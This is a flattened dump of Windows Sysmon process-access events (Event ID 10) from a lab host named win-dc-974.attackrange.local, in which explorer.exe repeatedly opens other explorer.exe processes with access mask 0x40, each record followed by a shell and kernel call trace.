16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244911Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244910Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244909Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244908Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244907Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244906Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244905Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244904Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244903Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244902Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244901Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244900Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244899Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244898Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244897Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244896Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244895Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244894Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244893Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244892Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244891Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244890Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244889Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244888Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244887Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244886Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244885Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244884Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 